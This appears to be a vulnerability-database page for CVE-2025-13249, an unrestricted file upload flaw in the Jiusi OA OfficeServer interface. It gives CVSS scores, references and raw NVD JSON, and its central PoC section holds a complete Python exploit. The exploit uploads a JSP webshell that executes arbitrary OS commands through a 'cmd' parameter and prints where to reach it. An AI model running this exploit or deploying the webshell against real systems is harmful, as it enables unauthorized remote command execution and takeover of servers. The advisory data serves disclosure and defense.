CVE-2025-13249

Description

A security vulnerability has been detected in Jiusi OA up to 20251102. This affects an unknown function of the file /OfficeServer?isAjaxDownloadTemplate=false of the component OfficeServer Interface. Such manipulation of the argument FileData leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed publicly and may be used.

CVSS Details

CVSS Score

6.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Jiusi OA <= 20251102

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-13249 PoC - Jiusi OA Arbitrary File Upload
# Target: Jiusi OA <= 20251102
# Component: OfficeServer Interface

def exploit(target_url, filename='shell.jsp'):
    """
    Exploit arbitrary file upload vulnerability in Jiusi OA OfficeServer
    Args:
        target_url: Target Jiusi OA base URL
        filename: Malicious filename to upload
    """
    # Malicious JSP webshell content
    webshell_content = '<%@page import="java.io.*"%><%if(request.getParameter("cmd")!=null){Process p=Runtime.getRuntime().exec(request.getParameter("cmd"));OutputStream os=p.getOutputStream();InputStream in=p.getInputStream();DataInputStream dis=new DataInputStream(in);String disr=dis.readLine();while(disr!=null){out.println(disr);disr=dis.readLine();}}%>'
    
    # Target endpoint
    upload_url = f"{target_url.rstrip('/')}/OfficeServer"
    
    # Prepare multipart form data
    files = {
        'FileData': (filename, webshell_content, 'application/octet-stream'),
        'isAjaxDownloadTemplate': (None, 'false')
    }
    
    # Optional: Add authentication if required
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'
    }
    
    try:
        print(f"[*] Sending exploit request to {upload_url}")
        response = requests.post(upload_url, files=files, headers=headers, timeout=30)
        
        if response.status_code == 200:
            print(f"[+] File uploaded successfully: {filename}")
            print(f"[+] Access the webshell at: {target_url}/upload/{filename}")
            print(f"[+] Execute commands: ?cmd=whoami")
        else:
            print(f"[-] Upload failed with status code: {response.status_code}")
            print(f"[-] Response: {response.text[:200]}")
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")

if __name__ == '__main__':
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-13249.py <target_url>")
        print("Example: python cve-2025-13249.py http://vulnerable-server.com")
        sys.exit(1)
    exploit(sys.argv[1])

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-13249
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-13249
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-13249/
[4] VulDB https://vuldb.com/cve/CVE-2025-13249
[5] https://github.com/rooboot501/my-project/blob/main/jiousi.md
[6] https://vuldb.com/?ctiid.332583
[7] https://vuldb.com/?id.332583
[8] https://vuldb.com/?submit.687599

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-13249", "sourceIdentifier": "[email protected]", "published": "2025-11-16T12:15:42.893", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security vulnerability has been detected in Jiusi OA up to 20251102. This affects an unknown function of the file /OfficeServer?isAjaxDownloadTemplate=false of the component OfficeServer Interface. Such manipulation of the argument FileData leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed publicly and may be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}, {"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://github.com/rooboot501/my-project/blob/main/jiousi.md", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.332583", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.332583", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.687599", "source": "[email protected]"}]}}